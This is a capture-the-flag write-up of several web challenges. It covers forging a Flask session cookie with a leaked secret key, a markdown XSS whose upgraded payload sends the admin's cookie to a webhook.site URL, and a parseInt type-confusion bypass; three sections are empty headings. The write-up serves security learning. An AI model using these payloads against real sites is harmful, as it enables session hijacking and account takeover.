Web Challs

Table of content

  • Baby Web (Flask session cookie)

  • Markdown Parser (XSS in markdown)

  • Greyctf Survey (parseInt issues)

  • Beautiful Styles (CSS Injection)

  • Fearless Concurrency

  • No SQL Injection

The web app is written in Flask. Check session cookie:

flask-unsign --decode --cookie 'eyJpc19hZG1pbiI6ZmFsc2V9.ZiNV-w.Umcx64Jf6IYqXHUDpmtp3GZPSYs'

The secret key is given in plaintext in the source code. Flip is_admin to True and forge Flask session cookie:

flask-unsign --sign --cookie "{'is_admin': True}" --secret 'baby-web'

View source code:

Visit /flag route and get flag.

Markdown Parser (XSS in markdown)

XSS injection point:

Test XSS in the language field:

```" onmouseover="alert(1)
/* code here */

This works since the payload is rendered as the following HTML code:

<pre><code class="language-"onmouseover="alert(1)">/* code here */</code></pre>

See if we can trigger without using any attribute:


It is possible to setal admin’s cookie since httpOnly flag is set to false:

Use webhook:


Upgrade the payload for stealing admin’s cookie:

```"></code></pre><script>new Image().src="https://webhook.site/2e050fe1-0ffe-4c30-8dfa-2b0769240238/"+(document.cookie);</script><pre><code>

This payload forces the web app to send a GET request to our webhook.

Inject payload and get flag.

Greyctf Survey (parseInt issues)

Soft spot:

vote has must have type ‘number’, and it is between -1 and 1. Our goal is to let:

-0.42069 + parseInt(vote) > 1

The problem is, parseInt() is designed to parse string instead of number. When you feed numbers into it, it can trigger weird behavior:

So basically parseInt() converts function argument to string since we provided a number. For something like 0.09, it becomes "0.09", and it is evaluated as 0 since only the first character gets parsed. But if we provide something with many zeros like 0.00000009, it becomes "9e-8", so evaluated to 9. That breaks the assumption of the checks.

Beautiful Styles (CSS injection)

Fearless Concurrency

No SQL Injection

Last updated